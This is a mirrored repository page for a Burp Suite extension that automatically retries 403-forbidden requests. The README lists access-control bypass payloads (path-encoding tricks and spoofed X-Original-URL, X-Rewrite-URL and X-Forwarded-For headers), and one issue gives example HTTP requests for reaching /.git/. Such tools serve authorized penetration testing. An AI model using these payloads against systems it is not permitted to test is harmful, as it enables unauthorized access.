Coder Social home page Coder Social logo

burpsuite_403bypasser's Introduction

403Bypasser

An burpsuite extension to bypass 403 restricted directory. By using PassiveScan (default enabled), each 403 request will be automatically scanned by this extension, so just add to burpsuite and enjoy.

Payloads: $1: HOSTNAME $2: PATH

$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2anything -H "X-Original-URL: /$2" 
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" 
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/

Thanks @lohubi for contributing many payloads.

Installation

BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish

Screenshot

References:

burpsuite_403bypasser's People

Contributors

ashkanrafiee avatar lobuhi avatar sting8k avatar xib3rr4dar avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

polling-repo-continua hunter0x8 chienhm vinnyvinoth varshithrajbasa ashr 0xnoobie1100 nutmag attacker-codeninja 0xlyk4n whoami15 w00t3k arman1388 saugatasil hemantsolo cyb3rsalih swarupsro exengineer1 slooppe harry1080 laowang1026 lobuhi techris45 mmioimm fngoo crackercat leekeey 8183k bahadirtmzr vedattascier titounkle reewardius arpansadhu10 irony0egoist narayanr7 cr-sh cutff matwizy sec-js claconsay alvinmurimi 5m477 blackstarkk netsstea psbachto gmwshz xiaoqin00 chouaibhm mjgrey bill-bil fairuzmn marcos-tolosa dskho vkbiu ferpalma21 alainw68 prongedfork affilares hollow667 ninja-pandit evilcy cybersealops vnhzero951 1r0n51d3 th3cyb3rc0p brahst 5l1v3r1 rajivraj kernux xib3rr4dar idledrifter popmedd baisys qemm rvrsh3ll seanzhangmelon itsintern guptaofficial17 aman566 mksx sec99 fatmeat saddam1999 spwn3r49sd3r00 st3rven invokethreatguy nusiloot cryptoknife zeroc00i aglerj rohitgupta3050 safisec heartway secfb fdlucifer all-the-time lcl99 beibeijin y0d4a jiaowodalang

burpsuite_403bypasser's Issues

X-Original-Url / X-Rewrite-Url bypass

Hey, I think you are using X-Original-Url / X-Rewrite-Url vector in a wrong way. These headers usually help to bypass front server rules, which are based on URI, but you don't change URI while using these headers.

First, normal request returns 403:

GET /.git/ HTTP/1.1
Host: example.com

This attempt to bypass will return 403 too, because URI hasn't changed and the rule still applies:

GET /.git/ HTTP/1.1
Host: example.com
X-Rewrite-URL: /.git/

This one should bypass the restriction:

GET / HTTP/1.1
Host: example.com
X-Rewrite-URL: /.git/

Issue while adding extension in burp

I get this error while loading extension from python file:

java.lang.Exception: Failed to load Python interpreter from Jython JAR file at burp.e76.<init>(Unknown Source) at burp.f1z.a(Unknown Source) at burp.gvj.lambda$panelLoaded$0(Unknown Source) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515) at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628) at java.base/java.lang.Thread.run(Thread.java:834)

NotImplementedError

jdk 15, burpsuite v2021.8, jython-standalone-2.7.0

NotImplementedError

	at org.python.core.Py.NotImplementedError(Py.java:167)
	at org.python.proxies.__main__$BurpExtender$0.doActiveScan(Unknown Source)
	at burp.csj.run(Unknown Source)
	at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
	at java.base/java.lang.Thread.run(Thread.java:832)

image

Extension loaded in BurpSuite but not working

Hi,

I've loaded the extension in BurpSuite with no errors, but when requesting a resource with a 403 response, I don't see any other requests in the Proxy HTTP History.

I'm doing something wrong?

Thanks

I made this error when loading the plug-in

Traceback (most recent call last):
File "", line 1, in
OSError: (22, 'Invalid argument', 'D:\Burp_Suite_Pro_v2021.8\bp??\BurpSuite_403Bypasser-main')

at org.python.core.Py.OSError(Py.java:135)
at org.python.modules.posix.PosixModule.absolutePath(PosixModule.java:1343)
at org.python.modules.posix.PosixModule.chdir(PosixModule.java:300)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:64)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at org.python.core.PyReflectedFunction.__call__(PyReflectedFunction.java:190)
at org.python.core.PyReflectedFunction.__call__(PyReflectedFunction.java:208)
at org.python.core.PyObject.__call__(PyObject.java:461)
at org.python.core.PyObject.__call__(PyObject.java:465)
at org.python.pycode._pyx2.f$0(<string>:1)
at org.python.pycode._pyx2.call_function(<string>)
at org.python.core.PyTableCode.call(PyTableCode.java:173)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.Py.runCode(Py.java:1687)
at org.python.core.Py.exec(Py.java:1731)
at org.python.util.PythonInterpreter.exec(PythonInterpreter.java:268)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:64)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at burp.fpz.<init>(Unknown Source)
at burp.d25.a(Unknown Source)
at burp.gix.lambda$panelLoaded$0(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)

Error while uploading the extension on Burp with the latest jython 2.7.2

SyntaxError: Non-ASCII character in file 'C:\Users\sbdefault\Desktop\Burp Custom Extensions\403bypasser.py', but no encoding declared; see http://www.python.org/peps/pep-0263.html for details

at org.python.core.Py.SyntaxError(Py.java:171)
at org.python.core.ParserFacade.fixParseError(ParserFacade.java:105)
at org.python.core.ParserFacade.parse(ParserFacade.java:190)
at org.python.core.Py.compile_flags(Py.java:2232)
at org.python.core.__builtin__.execfile_flags(__builtin__.java:527)
at org.python.util.PythonInterpreter.execfile(PythonInterpreter.java:287)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at burp.ip.<init>(Unknown Source)
at burp.xkf.a(Unknown Source)
at burp.plh.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.